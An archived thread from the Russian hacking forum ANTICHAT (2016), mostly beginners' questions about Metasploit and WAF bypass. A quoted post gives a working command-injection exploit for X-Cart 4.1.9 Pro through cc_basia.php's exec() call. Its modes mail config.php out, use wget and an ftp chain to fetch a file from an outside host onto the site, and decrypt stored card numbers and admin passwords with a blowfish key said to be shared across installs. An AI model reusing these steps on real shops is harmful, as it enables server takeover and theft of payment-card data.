ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.09.2016, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 33728
Репутация:
14
|
|
Сообщение от Sensoft
Sensoft said:
↑
Смотри просканировал сайт на порты, там много открытых было, там был порт 80 версия программы, я вёл поиск на Apache httpd 2.2.22 ((Debian)) вывело херову тучу я взял самым высоким риском excellent, прописал всё и вёл exploit потом вывело это
И мне интересно я подключился ?
Код:
Code:[*] Started reverse TCP handler on 192.168.1.4:4444[*] Exploit completed, but no session was created.
msf exploit(struts_dev_mode) >
Я подключился к тому серверу или нет ?
Написано же что сеанс не был создан.
Не подключился ты никуда..
|
|
|
|

08.09.2016, 16:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Как в PentestBox открыть Metasploit Framework не консольно а интерфейсом ?
|
|
|
|

08.09.2016, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
|
|
|
|

09.09.2016, 08:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Сообщение от r1l
r1l said:
↑
кто умеет обходить WAF? Ну или по пытается хотя бы, есть очень хороший прибыльный варик
это плохо?

Погугли обход WAF.Но я думаю,что там не просто нужно использовать стандартные обходы,но и самому конструировать запросы . Кстати это плохо.)
|
|
|
|

09.09.2016, 08:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Сообщение от Sensoft
Sensoft said:
↑
В Metasploit Framework встроен сканер на порты nmap если сканить им из Metasploit Framework то инфа сохраняется в базе
Можно ли запросом поставить на то чтобы программа сама подбирала эксплоиты и проверяла на уязвимости ?
Скачай Armitage .
|
|
|
|

09.09.2016, 10:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от SaNDER
SaNDER said:
↑
Скачай Armitage .
Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
|
|
|
|

09.09.2016, 12:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 506
Репутация:
0
|
|
подскажите пожалуйста что есть на x-cart 4.1.9 Pro
|
|
|
|

09.09.2016, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Сообщение от Sensoft
Sensoft said:
↑
И не хера не говорят как на винду поставить шикарно
В чём проблема скачай Linux.Пусть будет и Windows,и Linux .
|
|
|
|

09.09.2016, 20:27
|
|
Guest
Сообщений: n/a
Провел на форуме: 51198
Репутация:
3
|
|
Сообщение от EstGi
EstGi said:
↑
подскажите пожалуйста что есть на x-cart 4.1.9 Pro
Цитирую:
.SpoilerTarget" type="button">Spoiler
При установке X-Cart требует наличия exec() и выключенного сейфмода для работы скриптов обработки картона. Сам картон и пароли пользователей зашифрованы алгоритмом blowfish и хранятся в БД; ключ blowfish хранится в config.php вместе с настройками для подключения к БД.
После целенаправленного поиска всех вызовов exec(), был обнаружен незащищенный скрипт, который не фильтрует поступающие данные, попадающие в exec().
payment/cc_basia.php:
PHP:
if($REQUEST_METHOD == "POST" && isset($HTTP_POST_VARS["boamsg"]) && empty($HTTP_POST_VARS["boaref"]))
{ x_load('order');
$pp_path = func_query_first_cell("SELECT param02 FROM $sql_tbl[ccprocessors] WHERE processor='cc_basia.php'"); $resp = parse_basia_response($HTTP_POST_VARS["boamsg"]); /* ... */ }
PHP:
function parse_basia_response($resp)
{
global $pp_path; exec(func_shellquote($pp_path)."/decrypt ".$resp." 2>&1";,$out); $resp = $out[0]; /* ... */ }
Вывода exec() получить нельзя, но команды успешно выполняются.
Эксплоит работает в интерактивном режиме, поэтому нужен CLI-интерфейс. Первый параметр URL, второй - режим работы. Всего сделал 4 режима:
[LIST][*] ch/ check - проверка доступности exec() через вывод некоторых параметров конфигурации PHP в скрипте check_requirements.php с GET-параметром checkrequirements. В большинстве случаев, если путь указан верно, exec() будет доступен.
[*] e/ exec - выполнение команд. Здесь надо отметить, что в команде не допускаются символы, которые могут быть заэкранированы addslashes(). Это также особо не препятствует удачному взлому.
[*] c/ config - отправка config.php на email. Эксплоит запросит ваш email и выполнит такую команду:
cat ../config.php | mail $email
[*] u/ upload - загрузка файлов с помощью wget. Будут запрошены URL удаленного файла, а также локальный путь для сохранения. Локальный путь нужно указывать относительно папки, где установлен X-Cart. Его можно не указывать, тогда будет использоваться файл skin1/main/error_realtime_shipping_disabled.php. По завершени выполнения команды будет предложено применить touch на созданном файле.
Если файлы не закачиваются, то вероятно wget'а нет или к нему запрещен доступ. Самый верный вариант - заливать с помощью ftp. Для этого запускаем второй режим и выполняем команду:
cd ../skin1/main/; echo user [user] [pass]>ftp.txt; echo prompt>>ftp.txt; echo get s.php>>ftp.txt; echo bye>>ftp.txt; ftp -n -v [host] mdecrypt('06a907f395516c9dfb4489e7de21d50141fabf5b 9b007787', 'bb3704bed294be6d89b840b3fc184039');
blowfish.php - это отредактированный скрипт из поставки X-Cart (см. в атаче); первый аргумент функции это зашифрованное значение, второй - ключ. Кстати на всех сайтах, которые мне попадались - ключ был один и тот же: bb3704bed294be6d89b840b3fc184039. Пароли админов расшифровываются аналогичным способом.
|
|
|
|

10.09.2016, 00:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 33728
Репутация:
14
|
|
Сообщение от Sensoft
Sensoft said:
↑
Блин я хочу понять почему там у меня проблема я уже столько мучался с этим, не хочу бросать уже столько прочитал но фак не как не могу создать чёртову базу данных
Linux как вторую ОС не вариант поставить ?..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|